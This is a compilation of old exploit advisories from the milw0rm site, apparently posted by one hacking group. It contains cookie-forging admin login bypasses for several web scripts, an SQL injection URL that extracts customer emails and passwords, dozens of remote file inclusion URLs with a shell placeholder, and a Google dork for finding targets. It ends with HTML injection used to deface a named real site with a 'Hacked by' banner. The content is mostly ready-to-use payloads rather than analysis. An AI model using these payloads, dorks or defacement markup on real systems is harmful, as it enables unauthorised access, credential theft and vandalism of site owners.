-------------------------------------------------------------------------
RSS Feeds URL portal site (Cookie) Login Bypass Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : RSS Feeds URL portal site
Scripts site    : http://buymyscripts.net/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://rss.buymyscripts.net/
Demo Admin :
http://rss.buymyscripts.net/admin/
Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Lyrics Script (Cookie) Login Bypass Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Lyrics Script
Scripts site    : http://buymyscripts.net/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://goodlyrics.org/
Demo Admin :
http://goodlyrics.org/admin/
Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
Membership Site Script (Cookie) Login Bypass Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Membership Site Script
Scripts site    : http://buymyscripts.net/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://membership.buymyscripts.net/
Demo Admin :
http://membership.buymyscripts.net/admin/
Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
Recipe website script (Cookie) Login Bypass Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Recipe website script
Scripts site    : http://buymyscripts.net/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://www.tasty-recipes.org/
Demo Admin :
http://www.tasty-recipes.org/admin/
Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
Hotscripts.com clone script (Cookie) Login Bypass Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Hotscripts.com clone script
Scripts site    : http://buymyscripts.net/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://hotscripts.buymyscripts.net/
Demo Admin :
http://hotscripts.buymyscripts.net/admin/
Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------

------------------------------------------------------------------------
e-Book Store web site script (Cookie) Login Bypass Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : e-Book Store web site script
Scripts site    : http://buymyscripts.net/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://ebook.buymyscripts.net/
Demo Admin :
http://ebook.buymyscripts.net/admin/
Exploit:
javascript:document.cookie = "username=test; path=/admin/";
javascript:document.cookie = "password=test; path=/admin/";
------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Script Toko Online Vs.5.01
Scripts site    : http://www.gempar.com/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://www.gempar.com/demotoko/

Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*

# milw0rm.com [2009-01-26]
========================================================================================




+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Harris Wap Chat
Discovered By   : k1n9k0ng
Scripts site    : http://www.successkid.com/
Download Script : http://www.successkid.com/blogs/?p=2
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee
          letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://successkid.com/wapchat/itdiv.php

Bug Found:
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreate.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreateSave.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.createRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.forward.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.pageLogout.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.resultMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.saveNewRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.searchMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
===============================================================================================





# milw0rm.com [2008-04-30]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : vcart version 3.3.2
Discovered By   : k1n9k0ng
Scripts site    : http://www.visionburst.com/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee, letjen, k1tk4t
site            : www.sekuritionline.net
dork        : Powered by "vcart 3.3.2"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug found:
"http://www.site.net/index.php?abs_path=[shell]"
"http://www.site.net/checkout.php?abs_path=[shell]"

# milw0rm.com [2008-01-11]
===============================================================================================




+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : MOSMediaLite451
Discovered By   : k1n9k0ng
Scripts site    : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );

bug found:
"http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell] " 

# milw0rm.com [2007-10-08]
=====================================================================================================


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# milw0rm.com [2007-08-09]
========================================================================================================




fishcart_v3 (fc_example.php) Remote File Include Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts            : fishcart_v3
Discovered By : k1n9k0ng
Scripts site      :
http://fishcart.org/fc_installer_snap_2007_08_03.zip
http://fishcart.org/fishcart_snap_2007_08_03
http://fishcart.org/fishcart_snap_2007_08_03.tgz

Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To       : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site                 : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
<?php require($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php'); ?>

bug found:
"/fishcart_v3/fc_functions/fc_example.php?docroot=[shell]"

# milw0rm.com [2007-08-08]

===================================================================

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : CMS Jamroom Version: 3.3.5
Discovered By   : Cyberlog
Scripts site    : http://www.jamroom.net/
Download Script : http://www.jamroom.net/index.php?m=td_download&o=download&file_id=43
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : k1n9k0ng, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee
                  letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require_once("{$jamroom['jm_dir']}/include/jamroom-payment.inc.php");

Bug Found:
http://www.site.com/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=[shell]

# milw0rm.com [2008-06-20]
===================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : CMS joomla
Discovered By   : k1n9k0ng
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : Cyberlog, adhietslank, sukam, cah_gemblunkz, the_sims, aRiee
                  letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net


i found bug component joomla/mambo in com_booklibrary, you can search
in google with key:
allinurl:"index.php?option=com_booklibrary"

example site:
http://www.gc-upa.de/index.php?option=com_booklibrary&task=view&catid=&id=3&Itemid=79
you can change comment in that site with script HTML

example script HTML:
<div id="Layer1" align="center" style="position:absolute; width:763px;
height:462px; z-index:1; background-color: #000000;
layer-background-color: #000000; border: 1px none #000000;">
<p align="center"><strong><font color="#FFFFFF" size="7">Hacked
by</font></strong></p>
<p align="center"><font color="#FF0000" size="7">
<strong>www.sekuritionline.net</strong></font></p>
</div>
=========================================================================